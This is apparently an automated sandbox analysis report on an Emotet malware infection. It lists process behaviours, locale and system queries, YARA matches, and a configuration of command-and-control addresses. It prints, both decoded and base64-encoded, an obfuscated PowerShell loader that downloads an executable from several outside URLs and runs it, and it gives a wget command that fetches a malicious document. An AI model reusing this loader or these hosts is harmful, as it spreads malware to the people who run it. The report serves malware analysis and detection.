Source: C:\Users\user\879.exe; Code function: 12_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\879.exe; Code function: 12_2_00444764 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Users\user\879.exe; Code function: 12_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\879.exe; Code function: 12_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\879.exe; Code function: 12_2_00444786 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Users\user\879.exe; Code function: 12_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_00444764 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_00444786 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe; Code function: 13_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown; Process created: Base64 decoded $Evizklrl='Zpxlmpjesfu';$Nazcyjtbtbhwj = '879';$Pjigzgyiukxvz='Lvpbpzuwqhly';$Djaaouswnbrhy=$env:userprofile+'\'+$Nazcyjtbtbhwj+'.exe';$Wihijkbdllr='Vmnqqkmhkfvx';$Kqvfoxypez=&('new'+'-ob'+'ject') nEt.WebcLIENT;$Algyovsmnirll='http://ta-behesht.ir/images/Provx00a/*http://tatcogroup.ir/wp-admin/UC/*http://tcpartner.ru/wp-includes/nr8/*http://tepcian.utcc.ac.th/wp-admin/SquR/*http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'."sP`lIT"([char]42);$Mrynihqxcqnp='Hkdkzhzkcrv';foreach($Xhipsvwp in $Algyovsmnirll){try{$Kqvfoxypez."dOwnL`O`ADFIle"($Xhipsvwp, $Djaaouswnbrhy);$Jmclkjqp='Xiiaxkwcaw';If ((.('Get'+'-I'+'tem') $Djaaouswnbrhy)."Le`NgTh" -ge 37432) {([wmiclass]'win32_Process')."CRE`ATe"($Djaaouswnbrhy);$Ckxsucohstchl='Cgxavxfbr';break;$Zgovrhjm='Mqvnxffo'}}catch{}}$Mlrztzvecwjg='Ciswcvxyzeqq'
Injects files into Windows application
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE; Injected file: C:\Users\user\Desktop\download\QDC5QK1.doc was created by C:\Windows\SysWOW64\wget.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown; Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkA
OwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
May try to detect the Windows Explorer process (often used for injection)
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmp Binary or memory string: Progman
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)
Source: C:\Users\user\879.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,12_2_0045A05D
Source: C:\Users\user\879.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_0045C068
Source: C:\Users\user\879.exe Code function: EnumSystemLocalesA,12_2_0045C03E
Source: C:\Users\user\879.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_0045C0CD
Source: C:\Users\user\879.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,12_2_0045C109
Source: C:\Users\user\879.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,12_2_0045A2E1
Source: C:\Users\user\879.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,12_2_0045C5E9
Source: C:\Users\user\879.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,12_2_0045A5A5
Source: C:\Users\user\879.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,12_2_0045C75F
Source: C:\Users\user\879.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,12_2_0045C724
Source: C:\Users\user\879.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,12_2_0044C780
Source: C:\Users\user\879.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_0045C89C
Source: C:\Users\user\879.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,12_2_00464FD9
Source: C:\Users\user\879.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,12_2_0041B3F3
Source: C:\Users\user\879.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_004599CE
Source: C:\Users\user\879.exe Code function: GetLocaleInfoA,12_2_004619BF
Source: C:\Users\user\879.exe Code function: GetLocaleInfoA,12_2_0045BBC3
Source: C:\Users\user\879.exe Code function: _LcidFromHexString,GetLocaleInfoA,12_2_0045BCA5
Source: C:\Users\user\879.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,12_2_0045BD3B
Source: C:\Users\user\879.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,12_2_0045BDAD
Source: C:\Users\user\879.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,12_2_0045BF7D
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,13_2_0045A05D
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_0045C068
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: EnumSystemLocalesA,13_2_0045C03E
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_0045C0CD
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,13_2_0045C109
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,13_2_0045A2E1
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,13_2_0045C5E9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,13_2_0045A5A5
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,13_2_0045C75F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,13_2_0045C724
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,13_2_0044C780
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,13_2_0045C89C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,13_2_00464FD9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,13_2_0041B3F3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,13_2_004599CE
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetLocaleInfoA,13_2_004619BF
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetLocaleInfoA,13_2_0045BBC3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _LcidFromHexString,GetLocaleInfoA,13_2_0045BCA5
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,13_2_0045BD3B
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_0045BDAD
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_0045BF7D
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\879.exe Code function: 12_2_00455551 cpuid 12_2_00455551
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\879.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\879.exe Code function: 12_2_004475B7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_004475B7
Contains functionality to query time zone information
Source: C:\Users\user\879.exe Code function: 12_2_0044F600 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,12_2_0044F600
Contains functionality to query windows version
Source: C:\Users\user\879.exe Code function: 12_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,12_2_0043C85E
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000C.00000002.2126423927.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2421877565.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2126369833.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2421897150.0000000000681000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\879.exe Code function: 12_2_0040EE65 CreateBindCtx,12_2_0040EE65
Source: C:\Users\user\879.exe Code function: 12_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CreateBindCtx,12_2_0040FFD4
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0040EE65 CreateBindCtx,13_2_0040EE65
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe Code function: 13_2_0040FFD4 __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CreateBindCtx,13_2_0040FFD4

Malware Configuration

Threatname: Emotet

{"C2 list": ["71.126.247.90/9VRKRX4VeY", "104.236.28.47/z97ZWdfizXfGwwe", "104.236.28.47:8080", "80.86.91.91:8080", "80.86.91.91/otfaQrdMERYnyFW", "98.239.119.52/eKuzQTBgBoX", "0.86.91.91:8080"]}

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process